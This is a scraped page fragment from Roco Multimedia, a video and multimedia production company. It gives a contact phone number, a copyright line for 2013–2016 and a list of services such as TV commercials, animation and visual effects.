Phone: (+84) 909 750 741 (Mr.  Quan)

13 + 13 =

wrld-eps-01-0005

2013 – 2016 Roco, Inc. All rights reserved. Roco Multimedia offers television commercial, animation video, post production video, and creative video, led show effect video, visual effect video, viral video, and other multimedia productions.

logo-roco-78x78